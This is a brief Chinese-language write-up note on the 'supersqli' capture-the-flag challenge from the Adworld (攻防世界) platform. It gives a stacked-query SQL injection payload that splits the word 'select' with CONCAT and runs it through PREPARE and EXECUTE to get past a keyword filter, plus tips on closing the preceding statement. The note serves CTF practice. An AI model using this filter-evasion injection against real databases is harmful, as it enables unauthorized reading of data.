攻防世界supersqli 这个题用到了预编译的技巧,可以绕过对select等命令的限制 类似于分块传输了,很实在! -1’; //这个位置 set @sql = CONCAT(‘se’,‘lect * from 1919810931114514;’); prepare stmt from @sql; EXECUTE stmt; # //记得这里要用;去结束前面的语句,也就是1’ #可以执 行成功了,那么我们还需要在1’后面加一个; //来闭合前面的语句